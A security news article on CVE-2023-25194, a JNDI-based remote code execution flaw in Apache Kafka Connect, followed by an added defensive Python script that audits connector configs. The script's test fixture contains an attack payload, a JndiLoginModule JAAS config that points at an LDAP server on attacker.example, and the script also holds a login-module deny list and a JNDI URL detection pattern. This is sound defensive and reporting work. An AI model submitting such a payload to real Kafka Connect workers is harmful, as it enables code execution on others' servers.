Remote code execution flaw patched in Apache Kafka

Apache has patched a vulnerability in Kafka Connect that an authenticated attacker could use to achieve remote code execution (RCE) on a Connect worker.

The critical vulnerability, announced on February 8 and tracked as CVE-2023-25194, affects Apache Kafka Connect, the free, open source component of Apache Kafka that streams data between Kafka and external systems such as databases and key-value stores.

Apache claims that more than 80% of Fortune 100 organizations use the Kafka platform, including approximately seven out of every 10 banks.

According to Apache’s mailing list note, the security flaw was discovered by bug bounty hunter Jari Jääskelä, who reported the issue via Aiven’s HackerOne bug bounty program.

The vulnerability can only be triggered by someone who already has access to a Kafka Connect worker (the JVM process that runs connectors and their tasks) and who can create or modify connectors on that worker with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol. In practice that means access to the Connect REST API; Kafka Connect does not authenticate that API unless a REST extension is configured, so it should not be reachable from untrusted networks.

Log4Shell connection

The vulnerability turns on Java Naming and Directory Interface (JNDI) lookups against an attacker-controlled Lightweight Directory Access Protocol (LDAP) server, the same mechanism at the heart of ‘Log4Shell’, the landmark vulnerability discovered in the ubiquitous Java logging library Apache Log4j in 2021. Unlike Log4Shell, however, the Kafka bug cannot be triggered by an unauthenticated user supplying a log message; it requires the ability to change connector configuration. JNDI is also involved in another, newly disclosed critical vulnerability in Apache Sling JCR Base.

With the Kafka bug, an authenticated attacker could set a connector's client JAAS configuration (the sasl.jaas.config property, or its producer.override, consumer.override and admin.override variants) to the JDK's com.sun.security.auth.module.JndiLoginModule via either the Aiven API or the Kafka Connect REST API, forcing the worker to connect to an attacker-controlled LDAP server when the client logs in.

“The server will connect to the attacker’s LDAP server and it deserializes the LDAP response, which the attacker can use to execute java deserialization gadget chains on the Kafka Connect server,” the advisory reads. “Attacker[s] can execute commands on the server and access other resources on the network.”

When all of these prerequisites are met, Apache says, the worker performs JNDI requests on the attacker's behalf, potentially leading to remote code execution or denial of service.

Disclosure

The report was first submitted to Aiven via the organization’s bug bounty program on April 4, 2022. Triage took place in May, and Jääskelä was awarded a $5,000 bounty for the report before the issue was fixed and publicly disclosed.

Apache Kafka versions 2.3.0 through 3.3.2 are affected, and the vulnerability is fixed in version 3.4.0.

Apache notes that the connector-level client overrides used in the attack chain have been accepted since Kafka 2.3.0, which is why the affected range starts there. Version 3.4.0 adds a system property, org.apache.kafka.disallowed.login.modules, that blocks the listed login modules from being used in a SASL JAAS configuration; com.sun.security.auth.module.JndiLoginModule is blocked by default. Operators on 3.4.0 and later should leave that module on the list, and those who cannot upgrade immediately should restrict who can reach the Connect REST API.

Apache said: “We advise the Kafka Connect users to validate connector configurations and only allow trusted JNDI configurations. Also, examine connector dependencies for vulnerable versions and either upgrade their connectors, upgrading that specific dependency, or removing the connectors as options for remediation.”
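As an added example of the configuration validation Apache recommends above (not code from Apache Kafka, Aiven or the original article), the Python script below audits the JSON a client would send to the Connect REST API. It parses each JAAS-config property named in Apache's advisory, rejects the JndiLoginModule that the 3.4.0 default denylist blocks, and flags any login-module option pointing at a JNDI URL, which is the mechanism described in the attack section above. The property and class names come from the advisory; the connector configurations, host names and the parse_jaas and audit_connector helpers are constructed for illustration.

```python
"""Audit Kafka Connect connector configs for the JNDI login-module abuse behind
CVE-2023-25194.  Added example, not Apache Kafka, Aiven or Daily Swig code; the
connector configs and host names below are constructed for illustration."""
import json
import re

# Property names from Apache's advisory: the worker-level JAAS key plus the
# per-connector client overrides that Connect has accepted since Kafka 2.3.0.
JAAS_KEYS = (
    "sasl.jaas.config",
    "producer.override.sasl.jaas.config",
    "consumer.override.sasl.jaas.config",
    "admin.override.sasl.jaas.config",
)
PROTOCOL_KEYS = (
    "security.protocol",
    "producer.override.security.protocol",
    "consumer.override.security.protocol",
    "admin.override.security.protocol",
)

# Kafka 3.4.0 blocks this module by default through the
# -Dorg.apache.kafka.disallowed.login.modules system property; mirror that here.
DISALLOWED_LOGIN_MODULES = {"com.sun.security.auth.module.JndiLoginModule"}

# URL schemes a JNDI lookup would resolve by contacting a remote server.
JNDI_URL = re.compile(r"\b(ldaps?|rmi|iiop|dns)://", re.IGNORECASE)

# One JAAS entry: <LoginModule class> <control flag> [key=value ...];
JAAS_ENTRY = re.compile(
    r"^\s*(?P<module>[\w.$]+)\s+(?P<flag>required|requisite|sufficient|optional)\b"
    r"(?P<options>.*?);?\s*$",
    re.DOTALL | re.IGNORECASE,
)
OPTION = re.compile(r'([\w.]+)\s*=\s*(?:"([^"]*)"|(\S+))')


def parse_jaas(value):
    """Split a JAAS config string into (login module class, control flag, options).
    Raises ValueError when the string is not a single well-formed entry."""
    match = JAAS_ENTRY.match(value)
    if not match:
        raise ValueError(f"unparseable JAAS config: {value!r}")
    options = {key: quoted or bare for key, quoted, bare in OPTION.findall(match["options"])}
    return match["module"], match["flag"].lower(), options


def audit_connector(config):
    """Return (property, severity, message) findings for a connector config dict,
    i.e. the "config" object of a POST /connectors body or the whole body of a
    PUT /connectors/<name>/config request.  An empty list means nothing to block."""
    findings = []
    for key in JAAS_KEYS:
        if key not in config:
            continue
        try:
            module, _flag, options = parse_jaas(config[key])
        except ValueError as err:
            findings.append((key, "reject", str(err)))
            continue
        if module in DISALLOWED_LOGIN_MODULES:
            findings.append((key, "reject", f"disallowed login module {module}"))
        for name, val in options.items():
            if JNDI_URL.search(val):
                findings.append((key, "reject", f"option {name} targets a JNDI URL: {val}"))
    # The JAAS config is only consulted when a SASL protocol is selected, but a
    # later edit could flip that switch, so the module is rejected either way.
    uses_sasl = any(str(config.get(k, "")).upper().startswith("SASL_") for k in PROTOCOL_KEYS)
    if findings and not uses_sasl:
        findings.append(("security.protocol", "note",
                         "no SASL protocol set; JAAS config is inert today but still rejected"))
    return findings


# Constructed connector configs that match the advisory's description of the attack.
MALICIOUS = {
    "name": "jndi-sink",
    "connector.class": "org.apache.kafka.connect.file.FileStreamSinkConnector",
    "topics": "orders",
    "file": "/tmp/orders.txt",
    "consumer.override.security.protocol": "SASL_PLAINTEXT",
    "consumer.override.sasl.mechanism": "PLAIN",
    "consumer.override.sasl.jaas.config": (
        'com.sun.security.auth.module.JndiLoginModule required '
        'user.provider.url="ldap://attacker.example:1389/obj" '
        'useFirstPass="true" serviceName="x" group.provider.url="xxx";'
    ),
}
# Same JAAS string but no SASL protocol selected: inert for now, still rejected.
INERT = {**MALICIOUS, "name": "jndi-sink-inert"}
del INERT["consumer.override.security.protocol"]
BENIGN = {
    **MALICIOUS,
    "name": "orders-sink",
    "consumer.override.security.protocol": "SASL_SSL",
    "consumer.override.sasl.jaas.config": (
        'org.apache.kafka.common.security.plain.PlainLoginModule required '
        'username="connect" password="example-secret";'
    ),
}

if __name__ == "__main__":
    for cfg in (MALICIOUS, INERT, BENIGN):
        findings = audit_connector(cfg)
        verdict = "REJECT" if any(sev == "reject" for _, sev, _ in findings) else "allow"
        print(f"{cfg['name']}: {verdict}")
        print(json.dumps(findings, indent=2))
```

Run it as a pre-flight check in whatever deploys connectors, or behind a reverse proxy in front of the Connect REST API, so that a request carrying the JndiLoginModule never reaches a pre-3.4.0 worker. The parser only understands a single-module JAAS entry, which is all Kafka clients accept; anything it cannot parse is rejected rather than allowed through.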

Jääskelä also submitted a second critical vulnerability report concerning Apache Kafka in the same month.

Aiven’s JDBC sink connector, which bundles the SQLite JDBC driver, could be combined with an unprotected Jolokia JMX-over-HTTP bridge to achieve RCE on Kafka Connect servers. The bug bounty hunter was awarded $5,000 for this report, and the issue has since been resolved.

The Daily Swig has reached out to the Apache project and we will update this story as and when we hear back.

Source: https://portswigger.net/daily-swig/remote-code-execution-flaw-patched-in-apache-kafka
